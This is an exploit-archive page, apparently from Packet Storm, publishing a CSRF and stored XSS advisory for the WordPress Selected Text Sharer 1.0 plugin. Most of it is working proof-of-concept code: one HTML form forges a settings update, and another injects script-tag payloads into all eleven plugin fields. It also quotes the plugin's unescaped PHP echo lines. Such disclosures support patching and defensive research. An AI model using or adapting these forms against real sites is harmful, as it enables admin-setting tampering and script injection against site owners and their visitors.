exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Selected Text Sharer 1.0 CSRF / XSS

WordPress Selected Text Sharer 1.0 CSRF / XSS
Posted Aug 6, 2016
Authored by bl4ck_MohajeM

WordPress Selected Text Sharer plugin version 1.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 061f67aca478de631a55246adeceaf848525e285099f1d8db9eb3cbc9fef7d41

WordPress Selected Text Sharer 1.0 CSRF / XSS

Change Mirror Download
====================
[+] Exploit Title : WP Selected Text Sharer CSRF/XSS
[+] Exploit Author :bl4ck_mohajem
[+] Date : 2015/09/24
[+] Version : 1.0
[+] Tested on : Elementary Os
[+] Vendor Homepage :
http://www.aakashweb.com/wordpress-plugins/wp-selected-text-sharer/
=============================================================================
[+] Exploit CSRF :
<form method="post"
action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php">
<input name="wpsts_title" type="hidden" value='CSRF 1'>
<input name="wpsts_lists" type="hidden" value='CSRF 2'>
<input name="wpsts_borderColor" type="hidden" value='CSRF 3'>
<input name="wpsts_bgColor" type="hidden" value='CSRF 4'>
<input name="wpsts_titleColor" type="hidden" value='CSRF 5'>
<input name="wpsts_hoverColor" type="hidden" value='CSRF 6'>
<input name="wpsts_textColor" type="hidden" value='CSRF 7'>
<input name="wpsts_extraClass" type="hidden" value='CSRF 8'>
<input name="wpsts_truncateChars" type="hidden" value='CSRF 9'>
<input name="wpsts_element" type="hidden" value='CSRF 10'>
<input name="wpsts_bitly" type="hidden" value='CSRF 11'>
<input type="submit" name="wpsts_submit" value="Update">
</form>
=============================================================================
[+] Exploit XSS :
<form method="post"
action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php">
<input name="wpsts_title" type="hidden" value='"><script>alert(/XSS
1/)</script>'>
<input name="wpsts_lists" type="hidden"
value='</textarea><script>alert(/XSS 2/)</script>'>
<input name="wpsts_borderColor" type="hidden"
value='"><script>alert(/XSS 3/)</script>'>
<input name="wpsts_bgColor" type="hidden" value='"><script>alert(/XSS
4/)</script>'>
<input name="wpsts_titleColor" type="hidden"
value='"><script>alert(/XSS 5/)</script>'>
<input name="wpsts_hoverColor" type="hidden"
value='"><script>alert(/XSS 6/)</script>'>
<input name="wpsts_textColor" type="hidden"
value='"><script>alert(/XSS 7/)</script>'>
<input name="wpsts_extraClass" type="hidden"
value='"><script>alert(/XSS 8/)</script>'>
<input name="wpsts_truncateChars" type="hidden"
value='"><script>alert(/XSS 9/)</script>'>
<input name="wpsts_element" type="hidden" value='"><script>alert(/XSS
10/)</script>'>
<input name="wpsts_bitly" type="hidden" value='"><script>alert(/XSS
11/)</script>'>
<input type="submit" name="wpsts_submit" value="Update">
</form>
=============================================================================
[+] Vulnerable Code :

372:<input name="wpsts_title" id="wpsts_title" type="text"
value="<?php echo $wpsts_title; ?>"/>
388:<textarea name="wpsts_lists" id="wpsts_lists"><?php echo
$wpsts_lists; ?></textarea>
403:<input name="wpsts_borderColor" id="wpsts_borderColor"
class="color" type="text" value="<?php echo $wpsts_borderColor; ?>"/>
407:<input name="wpsts_bgColor" id="wpsts_bgColor" class="color"
type="text" value="<?php echo $wpsts_bgColor; ?>"/>
411:<input name="wpsts_titleColor" id="wpsts_titleColor" class="color"
type="text" value="<?php echo $wpsts_titleColor; ?>"/>
415:<input name="wpsts_hoverColor" id="wpsts_hoverColor" class="color"
type="text" value="<?php echo $wpsts_hoverColor; ?>"/>
419:<input name="wpsts_textColor" id="wpsts_textColor" class="color"
type="text" value="<?php echo $wpsts_textColor; ?>"/>
423:<input name="wpsts_extraClass" type="text" value="<?php echo
$wpsts_extraClass; ?>"/>
448:<input name="wpsts_truncateChars" type="text" value="<?php echo
$wpsts_truncateChars; ?>"/>
454:<input name="wpsts_element" type="text" value="<?php echo
$wpsts_element; ?>"/>
458:<input name="wpsts_bitly" type="text" value="<?php echo
$wpsts_bitly; ?>" size="40"/>
=================

###############################################3
tnx: ehsan cod3r - Milad hacking - n1arash - malah sky - bl4ck_li0n
###########################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close